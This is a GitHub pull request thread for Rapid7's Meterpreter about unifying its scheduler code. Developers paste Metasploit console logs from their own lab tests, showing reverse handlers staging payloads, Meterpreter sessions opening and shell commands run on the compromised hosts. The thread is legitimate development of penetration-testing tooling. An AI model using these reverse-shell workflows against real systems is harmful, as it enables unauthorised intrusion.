rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD

Unify Windows and POSIX scheduler.c #124

Closed rwhitcroft closed 9 years ago

rwhitcroft commented 9 years ago

Builds happily, seems to run fine too.

Tested as follows:

msf exploit(handler) > 
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...
[*] 10.10.123.194:55300 Request received for /xA1r...
[*] 10.10.123.194:55300 Staging connection for target /xA1r received...
[*] Encoded stage with x86/shikata_ga_nai
[*] Meterpreter session 1 opened (10.10.123.234:443 -> 10.10.123.194:55300) at 2015-02-06 13:53:34 -0500

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information         Connection
  --  ----                   -----------         ----------
  1   meterpreter x86/win32  rw-lap\rw @ RW-LAP  10.10.123.234:443 -> 10.10.123.194:55300 (192.168.0.32)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getpid
Current pid: 8664
meterpreter > shell
Process 8584 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\rw\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC78-D818

 Directory of C:\Users\rw\Desktop

....

C:\Users\rw\Desktop>hostname
hostname
rw-lap

C:\Users\rw\Desktop>whoami
whoami
rw-lap\rw

--

[*] Started reverse handler on 10.10.123.234:443 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 162.243.232.241
[*] Meterpreter session 1 opened (10.10.123.234:443 -> 162.243.232.241:39466) at 2015-02-06 13:56:36 -0500

meterpreter > getpid
Current pid: 5695
meterpreter > shell
Process 5704 created.
Channel 1 created.
$ pwd
/home/rw
$ getent passwd rw
rw:x:1000:1000:,4,,:/home/rw:/bin/bash
$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l

$

metasploit-public-bot commented 9 years ago

Can one of the admins verify this patch? For more information see: https://github.com/rapid7/meterpreter/wiki/CI-Testing

todb-r7 commented 9 years ago

jenkins, this is ok to test

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/147/ Test PASSED.

OJ commented 9 years ago

Nice work @rwhitcroft. Thanks again for the effort! I'll get onto this later today (my boy's birthday today, so, priorities!)

Cheers mate.

OJ commented 9 years ago

Processing :metal:

OJ commented 9 years ago

Linux working much better this time!

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 10.1.10.40
[*] Meterpreter session 2 opened (10.1.10.40:8000 -> 10.1.10.40:49034) at 2015-02-09 20:51:05 +1000

meterpreter > shell
Process 9931 created.
Channel 1 created.
id
uid=1000(oj) gid=1000(oj) groups=1000(oj),10(wheel),1001(promiscuous) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2$ pwd
/home/oj/code/metasploit-framework
sh-4.2$ ls
CONTRIBUTING.md        features                           msfpescan
COPYING                lib                                msfrop
Gemfile                log                                msfrpc
Gemfile.local.example  metasploit-framework-db.gemspec    msfrpcd
Gemfile.lock           metasploit-framework-full.gemspec  msfupdate
HACKING                metasploit-framework-pcap.gemspec  msfvenom
LICENSE                metasploit-framework.gemspec       packages
README.md              modules                            plugins
Rakefile               msfbinscan                         powershell_attack.txt
app                    msfcli                             script
config                 msfconsole                         scripts
coverage               msfd                               spec
data                   msfelfscan                         test
db                     msfencode                          tools
documentation          msfmachscan                        unicorn.rc
external               msfpayload
sh-4.2$ exit
exit
^C
Terminate channel 1? [y/N]  y
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter > 

OJ commented 9 years ago

Windows too

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.38
[*] Meterpreter session 3 opened (10.1.10.40:8000 -> 10.1.10.38:63507) at 2015-02-09 20:53:03 +1000

meterpreter > shell
Process 2528 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\oj\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E819-ECA4

 Directory of C:\Users\oj\Desktop

02/01/2015  09:31 AM    <DIR>          .
02/01/2015  09:31 AM    <DIR>          ..
12/09/2014  02:55 PM           468,056 Dbgview.exe
12/08/2014  04:51 PM             6,144 revtcp8000-x64.exe
12/08/2014  04:51 PM            73,802 revtcp8000-x86.exe
01/30/2015  12:40 PM             7,678 run-nouac.bat
               4 File(s)        556,706 bytes
               2 Dir(s)  32,691,019,776 bytes free

C:\Users\oj\Desktop>exit
meterpreter > getuid
Server username: WIN-TV01I7GG7JK\oj
meterpreter > 

OJ commented 9 years ago

Looking good. Landing.

OJ commented 9 years ago

Thanks @rwhitcroft !

rwhitcroft commented 9 years ago

Thanks @OJ :)